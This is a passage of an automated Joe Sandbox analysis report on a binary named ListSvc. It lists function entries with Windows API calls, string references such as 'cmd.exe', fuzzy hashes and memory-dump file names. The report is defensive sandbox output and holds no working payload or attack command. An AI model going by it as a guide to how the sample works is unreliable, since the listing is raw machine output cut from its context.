Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99

Uniqueness

Uniqueness Score: -1.00%

Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
Opcode Fuzzy Hash: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994

Uniqueness

Uniqueness Score: -1.00%

Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
Opcode Fuzzy Hash: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698

Uniqueness

Uniqueness Score: -1.00%

Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042B852
LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8

Uniqueness

Uniqueness Score: -1.00%

Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 005B8281
SetWindowTextW.USER32(?,00000000), ref: 005B8297

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA

Uniqueness

Uniqueness Score: -1.00%

Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510

Strings

CommonFilesDir, xrefs: 006AC35C, 006AC3D8
Common Files, xrefs: 006AC393
\Program Files, xrefs: 006AC349
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
SystemDrive, xrefs: 006AC2C1
cmd.exe, xrefs: 006AC53B
COMMAND.COM, xrefs: 006AC55C
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
ProgramFilesDir, xrefs: 006AC322, 006AC3A9

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28

Uniqueness

Uniqueness Score: -1.00%

Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510

Strings

CommonFilesDir, xrefs: 006AC35C, 006AC3D8
Common Files, xrefs: 006AC393
\Program Files, xrefs: 006AC349
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
SystemDrive, xrefs: 006AC2C1
cmd.exe, xrefs: 006AC53B
COMMAND.COM, xrefs: 006AC55C
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
ProgramFilesDir, xrefs: 006AC322, 006AC3A9

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38

Uniqueness

Uniqueness Score: -1.00%

Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window$DestroyLong
String ID:
API String ID: 2871862000-0
Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED

Uniqueness

Uniqueness Score: -1.00%

Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4

Uniqueness

Uniqueness Score: -1.00%

Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8

Uniqueness

Uniqueness Score: -1.00%

Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FormatMessage
String ID:
